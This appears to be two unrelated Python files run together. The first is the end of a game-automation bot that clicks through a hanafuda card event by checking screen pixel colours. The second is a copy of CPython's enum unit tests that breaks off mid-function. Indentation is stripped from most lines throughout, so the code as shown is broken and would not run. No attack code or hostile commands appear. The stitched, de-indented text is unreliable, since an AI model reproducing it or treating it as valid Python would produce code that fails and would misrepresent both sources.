auto_hanafubuki.change = True
battles = 0
enter_battle_select()
map_select(1, 1, last_map)
enter_battle_map_hanafubuki(auto_hanafubuki.change)
auto_hanafubuki.change = False
battles += 1
if not last_map:
log("去恢复疲劳度吧!")
last_map = True
else:
log("出阵 × " + str(battles))
else:
# 刷花时不设置禁止进军的条件。
click(631, 449) # 无脑进军
wait(1000)
# ------------------------- Generic event maps ---------------------------------------------
def if_in_campaign_face(campaign_name):
    # Given if_in_battle_select, are we on a particular event-map screen?
ifin = False
if campaign_name == "hanafuda":
ifin = (check_rgb(131, 139, [215, 64, 64]) and
check_rgb(388, 181, [255, 165, 188]) and
check_rgb(722, 178, [255, 208, 135]))
return ifin
def enter_campaign_face():
"""
从本丸进入活动图界面(函数):
若左侧活动菜单没调出来
点击左侧小三角调出活动菜单
点击活动banner
等待,直到加载出活动界面
若有4个地图:
点击所设定的地图
"""
click(109, 137)
wait(500)
click(109, 137)
wait(500)
# wait until hanafuda
while not if_in_campaign_face("hanafuda"):
wait(500)
click(482, 401)
wait(500)
def enter_campaign_map():
"""
决定出阵这个活动地图
"""
enter_battle_map(0)
# 这里采取花札的门票位置
click(504, 454)
wait(1000)
def fill_ticket():
"""
如果目前已经1个门票都没了,就回复1。不回复更多的了,我也怕浪费。
"""
if check_rgb(212, 223, [48, 32, 13]):
click(651, 213)
wait(500)
click(309, 373)
wait(500)
click(404, 367)
wait(500)
while not check_rgb(509, 369, [209, 0, 88]):
wait(500)
click(509, 367)
wait(500)
# -------------------------- Osaka Castle ----------------------------------------------
def if_in_next_stage():
    # (Osaka Castle) are we on the screen where the next floor can be entered?
pass
# --------------------------- Hanafuda -----------------------------------------------
def hanafuda_if_on_koikoi():
    # the koi-koi / agari prompt is showing
return (check_rgb(381, 151, [0, 114, 40]) and
check_rgb(663, 224, [0, 119, 45]) and
check_rgb(327, 284, [152, 77, 17]))
def hanafuda_if_on_select():
    # inside the hanafuda game, a card can be chosen now
return (check_rgb(264, 25, [155, 153, 135]) and
check_rgb(935, 455, [134, 0, 0]) and
check_rgb(942, 196, [85, 76, 41]))
def hanafuda_if_finish():
    # the hanafuda run is over; time to pick reward cards and go home
return (check_rgb(228, 20, [123, 39, 37]) and
check_rgb(735, 377, [26, 22, 18]) and
check_rgb(1011, 77, [197, 163, 114]))
def hanafuda_if_finish_count():
    # cards picked and rewards settled; really time to go home now
return (check_rgb(571, 93, [38, 10, 5]) and
check_rgb(892, 108, [91, 75, 57]) and
check_rgb(919, 462, [134, 0, 0]))
"""
用来判断各种役的绿边位置。存储位置为该役的[y, x1,x2,...]
HANAFUDA_KOU =[461, 26,56,86,116,146] # 五光,基础分5
HANAFUDA_TANN=[530, 225,255,285,315,345,375] # タン,基础分2
HANAFUDA_TANE=[530, 515,545,575,605,635,665] # タネ,基础分2
HANAFUDA_KASU=[530, 704,734,764,794,834,854,884,914,944,974,1004] # カス,基础分1
# 以下特殊组合加分均为2
HANAFUDA_HANA=[461, 414,444] # 月见酒
HANAFUDA_TUKI=[461, 484,514] # 花见酒
HANAFUDA_AKAN=[530, 26,56,86] # 赤短
HANAFUDA_AOTN=[530, 126,156,186] # 青短
HANAFUDA_SISI=[530, 415,445,475] # 猪鹿蝶
# 若在以上组合中取到了末尾的坐标,则直接加分5
常量按照分数区别定义如下:[score, y, [x1,x2,...,xn]]
"""
HANAFUDA_SCORE = [[5, 461, [26, 56, 86, 116, 146]],
[2, 530, [225, 255, 285, 315, 345, 375]],
[2, 530, [515, 545, 575, 605, 635, 665]],
[1, 530, [704, 734, 764, 794, 834, 854, 884, 914, 944, 974, 1004]],
[2, 461, [414, 444]],
[2, 461, [484, 514]],
[2, 530, [26, 56, 86]],
[2, 530, [126, 156, 186]],
[2, 530, [415, 445, 475]]]
HANAFUDA_GREEN = [102, 242, 47]  # main colour of the green border; sampling too close to its edge gives a different colour
def hanafuda_level():
"""
光标已经移到花札上时,通过底边栏判断花札选择优先级
"""
score = 0
for i in range(len(HANAFUDA_SCORE)):
if check_rgb_rough(HANAFUDA_SCORE[i][2][len(HANAFUDA_SCORE[i][2]) - 1],
HANAFUDA_SCORE[i][1],
HANAFUDA_GREEN, 20):
score += HANAFUDA_SCORE[i][0] + 5
continue
for j in reversed(range(len(HANAFUDA_SCORE[i][2]) - 1)):
if check_rgb_rough(HANAFUDA_SCORE[i][2][j],
HANAFUDA_SCORE[i][1],
HANAFUDA_GREEN, 20):
score += HANAFUDA_SCORE[i][0]
break
return score
HANAFUDA_X = [312, 436, 542, 656]
HANAFUDA_Y = [200, 410]
def hanafuda_select():
    # When two or three hanafuda cards are offered, choose one.
    sum_score = [0, 0, 0, 0]
    for i in range(4):
        cx = HANAFUDA_X[i]
        click_down(cx, HANAFUDA_Y[0])  # fake click: press on the card face,
        wait(300)
        sum_score[i] = hanafuda_level()  # meanwhile score it from the green markers in the bottom bar,
        wait(300)
        click_up(cx, HANAFUDA_Y[1])  # release somewhere else to simulate a mouse "move"
        wait(300)
    x = sum_score.index(max(sum_score))  # pick the highest-scoring card,
    click(HANAFUDA_X[x], HANAFUDA_Y[0])  # click it
    wait(500)
    click(HANAFUDA_X[x], HANAFUDA_Y[0])  # click twice in case the release was missed
def go_hanafuda_simple():
"""
从本丸开始,进入loop
"""
if if_in_home():
enter_campaign_face()
fill_ticket() # 虚拟伤害,保持总有一张门票可以用
enter_campaign_map()
# 这里就进入了花札地图。
elif hanafuda_if_on_koikoi():
# 如果koikoi就它,如果只有agari就它
click(552, 208)
wait(500)
click(552, 208)
wait(500)
elif hanafuda_if_on_select():
wait(2000)
hanafuda_select()
wait(500)
elif hanafuda_if_finish():
# 如果一圈跑完了,怎么进行后续操作(直到回到本丸/继续出击)
# 先选5张牌
wait(1000)
for i in range(5):
click(160 + i * 140, 200)
wait(500)
while not hanafuda_if_finish_count():
click(634, 482)
wait(800)
click(919, 450)
wait(5000)
else:
# 无脑点进军
for i in range(3):
click(634, 482)
wait(800)
# ------------------------------------------ end of kanesan ------------------------------------------
# </editor-fold>
"""
Start the main loop
"""
root.mainloop()
|
test_enum.py
|
import enum
import inspect
import pydoc
import sys
import unittest
from collections import OrderedDict
from enum import Enum, IntEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from datetime import timedelta
try:
import threading
except ImportError:
threading = None
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
try:
class StrEnum(str, Enum):
'accepts only string values'
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
except Exception as exc:
Name = exc
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
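# e.g. test_pickle_dump_load(self.assertIs, Stooges.CURLY) round-trips the member through
# every pickle protocol and asserts the result is the identical member object.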
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
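# classproperty sketch (an illustrative assumption, not one of the tests): defining
#   class Spam:
#       @classproperty
#       def hams(cls):
#           return 'eggs'
# makes both Spam.hams and Spam().hams evaluate to 'eggs'.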
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_format_enum_custom(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited(self):
class StrEnum(str, Enum):
pass
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
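# enum._reduce_ex_by_name makes __reduce_ex__ return the bare member name, so pickle stores the member by name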
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertIs(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
